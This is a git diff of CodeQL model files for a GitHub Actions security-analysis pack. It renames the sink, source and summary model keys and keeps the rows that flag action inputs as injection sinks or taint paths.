- ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 761776358994..448997b3136e 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 7106115c17a2..13af446f37d1 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 366e5dd17667..39e1c9ef6240 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a469063fc503..a442ed5cd531 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index d0d5b57574b5..a22fce01c453 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 3151e335d22d..74a5c7d592c7 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e74f953a1a15..e78dfb3b073d 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 0930fc246c38..29dac5cffeaa 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index 5b344799ad95..f2331633485c 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index 5b6f1342fc42..e492f6012788 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b34833d85f3a..a821b049232a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 9a58d9a764ff..4f9f887caf1f 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 74ef5820cb7a..365f3ac98f88 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index e05a3afd63a5..f42e84655338 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index a96ad45d624e..e21b52241667 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index a70e8facf7c1..6c4a5931b98f 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 66280f8bdd64..c7e89697afb6 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index 65965daeb1d4..aa8496038365 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ba9a04f588bf..ae869b6b5313 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index aea054e24b0a..9f5801b79c04 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index c8646cffe8ef..a4a473b8efd2 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index bb1c3ffca2a0..10a03e4d1863 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index d3bec5ea39d0..9af82b985f31 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index c65527150b5c..3b779d0b86d8 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 25565b445fca..6ad087730e41 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index d46a07dde969..fa9c19583524 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 2d162fbc9147..6bfaffb2bbab 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index fc91bacdb72d..03fa8beaf0b3 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index 8b2b4e79afa5..a4ccaac2d2e0 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2ea1fdf68556..7c32705dde54 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 21e0d819db74..902483f43997 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index bcc8ce6b80db..be86a330b97e 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 741ab37eb9b6..0a6f7c347226 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index a9d6b80a627f..613b3e0fc59f 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 73d4df99af28..489d47ac71e9 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index fb6ae5102e1b..4a98ecd4af16 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 8b29e5c99881..57dc40ef6b8b 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 5a5cedcaca5f..3b92f667ae90 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index d156d7da6581..da8b02312ea0 100644 --- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index 12d3f23f8fdf..c06d13301d27 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 30be564c42a4..61935c36f7d6 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 13d4cfeb814d..89f61cedc422 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 3043c9b30ec2..1aabfc23fc4b 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index 29d51d1bfbba..d55fdbc3ea98 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index 75a9650a92fb..d01ac86d3178 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index a85a4b466e25..bab76cbe27ff 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index a0c4d6f7ec50..02ac5032c797 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index b5d4629003b7..0c484d44549b 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index 4b96edeccc2f..c088c7a644eb 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index ae3ef2e2b1b7..5b22ac1f5fe8 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 079dfc1fc02b..3329a255e6f8 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 19edd617c670..14a1cdeed86a 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 8ab1d090b1cc..49931d93f885 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 9f8d987c0aff..37d0014bcbb4 100644 --- 